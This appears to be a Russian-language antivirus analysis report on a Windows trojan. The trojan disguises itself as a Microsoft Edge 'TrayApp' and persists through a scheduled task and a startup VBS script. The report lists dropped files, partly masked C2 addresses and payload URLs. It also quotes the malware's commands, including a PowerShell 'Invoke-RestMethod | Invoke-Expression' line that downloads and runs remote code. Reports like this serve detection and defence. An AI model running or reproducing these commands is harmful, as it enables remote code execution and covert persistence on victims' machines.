Техническая информация
Для обеспечения автозапуска и распространения
Создает или изменяет следующие файлы
- <SYSTEM32>\tasks\microsoft\windows\microsoftedge trayapp
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\microsoftedgeget.exe
- %ProgramFiles(x86)%\microsoft\edge\microsoft trayapp\2.txt
- %ProgramFiles(x86)%\microsoft\edge\microsoft trayapp\edge.dat.log1
- %ProgramFiles(x86)%\microsoft\edge\microsoft trayapp\ssasr.dll
- %ProgramFiles(x86)%\microsoft\edge\microsoft trayapp\trayapp.exe
- %ALLUSERSPROFILE%\microsoft\windows\start menu\programs\startup\trayapp.vbs
Сетевая активность
Подключается к
- '38.##6.248.140':80
- '43.##2.225.33':443
TCP
Запросы HTTP GET
- http://38.##6.248.140/0831/43.152.225.33/windows-get.exe
- http://38.##6.248.140/0831/43.152.225.33/TrayApp.exe
- http://38.##6.248.140/0831/43.152.225.33/TrayApp.vbs
Другие
- '43.##2.225.33':443
Другое
Создает и запускает на исполнение
- '%TEMP%\microsoftedgeget.exe' -nc -i http://38.##6.248.140/0831/43.##2.225.33/2.txt -P "%ProgramFiles(x86)%\Microsoft\Edge\Microsoft TrayApp"
- '%TEMP%\microsoftedgeget.exe' -nc http://38.##6.248.140/0831/43.##2.225.33/TrayApp.vbs -P "%ALLUSERSPROFILE%\Microsoft\Windows\Start Menu\Programs\Startup"
- '%ProgramFiles(x86)%\microsoft\edge\microsoft trayapp\trayapp.exe'
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ExecutionPolicy Bypass -Command "Invoke-RestMethod -Uri 'http://38.##6.248.140/0831/43.##2.225.33/1.txt' | Invoke-Expression"
